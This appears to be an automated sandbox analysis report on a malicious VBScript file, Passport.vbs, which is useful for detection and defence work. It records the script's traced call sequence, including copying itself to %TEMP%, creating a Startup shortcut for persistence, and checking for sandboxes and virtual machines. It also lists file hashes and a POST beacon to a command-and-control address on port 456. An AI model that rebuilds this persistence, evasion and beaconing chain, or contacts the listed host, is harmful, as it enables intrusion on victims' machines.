Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4525760224.00000282CADAD000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr	String found in binary or memory: https://ipinfo.io/org
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/org_
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior

Java / VBScript file with very long strings (likely obfuscated code)

Source: Passport.vbs

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.troj.evad.winVBS@2/7@1/2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Passport.vbs

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: pesuti.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\Temp\Passport.vbs

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();5000IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbem

Persistence and Installation Behavior

Windows Shell Script Host drops VBS files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Passport.vbs

Jump to behavior

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49730

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Potential context-aware VBS script found (checks for environment specific values)

Source:	Initial file: If objItem.Model = "Google Compute Engine" Then
Source: C:\Windows\System32\wscript.exe	Dropped file: If objItem.Model = "Google Compute Engine" Then			Jump to dropped file

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnq
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCFA3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP@

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 34.117.59.81 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 185.244.29.74 456			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wscript.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1523251
Product:	CloudBasic
Start time:	11:00:07
Start date:	01.10.2024
Sample:	Passport.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a6e8ec20954128687a0534917c8f9ddd
SHA1:	c0bac2548af02d37b18b16bddb39ccd9ea5f0cc2
SHA256:	aca5887474e22b7be6121c56919953745a7a821311080acbe8970da7ed9479b8
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\country[1].htm	ASCII text	D10ACBA4ACACA68B887D94B595E71EC6	76439FE70C8DB67DB1ADDA66126EE49C611CEF7D	F85238153CB86E182385EB3CE867FA7FD7D54EDAE68C4F6A4F0DC9DEFDC210FE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\org[1].htm	ASCII text	8F57C9D4332780588B5B219A4C857C65	EFDEE7EB8E0883DE9C6ADCB086ED4E9466F0499D	88A16D400E75A0AF842001D48932AB1F45F12D3ADABD005843644C6C4443BC95
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\country[1].htm	ASCII text	D10ACBA4ACACA68B887D94B595E71EC6	76439FE70C8DB67DB1ADDA66126EE49C611CEF7D	F85238153CB86E182385EB3CE867FA7FD7D54EDAE68C4F6A4F0DC9DEFDC210FE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\org[1].htm	ASCII text	8F57C9D4332780588B5B219A4C857C65	EFDEE7EB8E0883DE9C6ADCB086ED4E9466F0499D	88A16D400E75A0AF842001D48932AB1F45F12D3ADABD005843644C6C4443BC95
C:\Users\user\AppData\Local\Temp\Passport.vbs	ASCII text, with CRLF line terminators	A6E8EC20954128687A0534917C8F9DDD	C0BAC2548AF02D37B18B16BDDB39CCD9EA5F0CC2	ACA5887474E22B7BE6121C56919953745A7A821311080ACBE8970DA7ED9479B8
C:\Users\user\AppData\Local\Temp\Passport.vbs:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Oct 1 08:00:57 2024, mtime=Tue Oct 1 08:00:57 2024, atime=Tue Oct 1 08:00:56 2024, length=5114, window=hide	86B97D7E46F42828EB74E83F0B38A905	87944F51FFEBD3AE9C31A1685A88408ED0DA330E	A543FF6131F50368354BB14DA2812AC9A2FE90779969CF9F54A2427A283507FD

Windows Analysis Report
Passport.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Passport.vbs

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Passport.vbs